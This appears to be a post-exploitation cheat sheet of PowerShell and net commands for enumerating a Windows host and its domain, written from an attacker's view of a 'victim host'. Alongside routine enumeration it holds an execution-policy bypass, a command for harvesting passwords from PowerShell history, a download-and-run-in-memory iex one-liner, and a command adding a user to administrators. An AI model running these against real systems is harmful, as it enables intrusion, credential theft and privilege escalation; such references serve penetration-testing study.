Powershell

hostname

Prints the PC's Name

[System.Environment]::OSVersion.Version

Prints out the OS version and revision level

wmic qfe get Caption,Description,HotFixID,InstalledOn

Prints the patches and hotfixes applied to the host

ipconfig /all

Prints out network adapter state and configurations

set %USERDOMAIN%

Displays the domain name to which the host belongs (ran from CMD-prompt)

set %logonserver%

Prints out the name of the Domain controller the host checks in with (ran from CMD-prompt)

Get-Module

Lists available modules loaded for use.

Get-ExecutionPolicy -List

Will print the execution policy settings for each scope on a host.

Set-ExecutionPolicy Bypass -Scope Process

This will change the policy for our current process using the -Scope parameter. Doing so will revert the policy once we vacate the process or terminate it. This is ideal because we won't be making a permanent change to the victim host.

Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt

With this string, we can get the specified user's PowerShell history. This can be quite helpful as the command history may contain passwords or point us towards configuration files or scripts that contain passwords.

Get-ChildItem Env: | ft Key,Value

Return environment values such as key paths, users, computer information, etc.

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"

This is a quick and easy way to download a file from the web using PowerShell and call it from memory.

net accounts

Information about password requirements

net accounts /domain

Password and lockout policy

net group /domain

Information about domain groups

net group "Domain Admins" /domain

List users with domain admin privileges

net group "domain computers" /domain

List of PCs connected to the domain

net group "Domain Controllers" /domain

List PC accounts of domains controllers

net group <domain_group_name> /domain

User that belongs to the group

net groups /domain

List of domain groups

net localgroup

All available groups

net localgroup administrators /domain

List users that belong to the administrators group inside the domain (the group Domain Admins is included here by default)

net localgroup Administrators

Information about a group (admins)

net localgroup administrators [username] /add

Add user to administrators

net share

Check current shares

net user <ACCOUNT_NAME> /domain

Get information about a user within the domain

net user /domain

List all users of the domain

net user %username%

Information about the current user

net use x: \computer\share

Mount the share locally

net view

Get a list of computers

net view /all /domain[:domainname]

Shares on the domains

net view \computer /ALL

List shares of a computer

net view /domain

List of PCs of the domain